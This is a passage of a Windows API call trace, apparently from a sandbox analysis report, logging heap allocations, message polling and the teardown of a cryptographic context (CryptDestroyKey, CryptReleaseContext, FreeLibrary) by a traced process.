wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0175.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.916] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.916] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0175.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0175.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.916] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.916] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0175.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0175.916] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.916] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.916] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0175.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0175.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0175.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.920] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0175.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0175.920] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.920] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0175.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0175.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.926] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.926] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0175.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0175.926] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0175.926] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0175.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0175.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0175.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0175.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0175.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0175.926] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.926] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0175.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.926] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0175.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0175.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0175.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0175.927] CryptDestroyKey (hKey=0x90af18) returned 1 [0175.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0175.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0175.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0175.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0175.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0175.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0175.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0175.927] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0175.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0175.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0175.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0175.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0175.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0175.927] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0175.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0175.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0175.928] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0175.928] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0175.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0175.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.928] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0175.928] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0175.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.928] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0175.928] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0175.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0175.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.928] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.928] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0175.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0175.928] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0175.928] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0175.928] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0175.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0175.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0175.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0175.929] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0175.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0175.929] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0175.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0175.929] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0175.929] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0175.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.929] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0175.929] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0175.929] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.929] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.929] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.929] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0175.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0175.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.930] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0175.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0175.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.930] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.930] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0175.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0175.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.930] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0175.930] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0175.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0175.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0175.930] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.931] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.931] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0175.931] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.931] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0175.931] FreeLibrary (hLibModule=0x74f20000) returned 1 [0175.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0175.931] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0175.932] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0175.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0175.932] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0175.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0175.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0175.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0175.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0175.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0175.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0175.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fa0 [0175.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0175.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0175.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0175.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0175.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0175.932] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0175.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0175.932] CloseHandle (hObject=0x120) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0175.933] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0175.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0175.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0175.933] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0175.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0175.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fa0 [0175.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0175.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0175.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0175.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0175.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0175.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0175.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.934] CloseHandle (hObject=0x138) returned 1 [0175.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0175.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0175.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0175.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0175.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 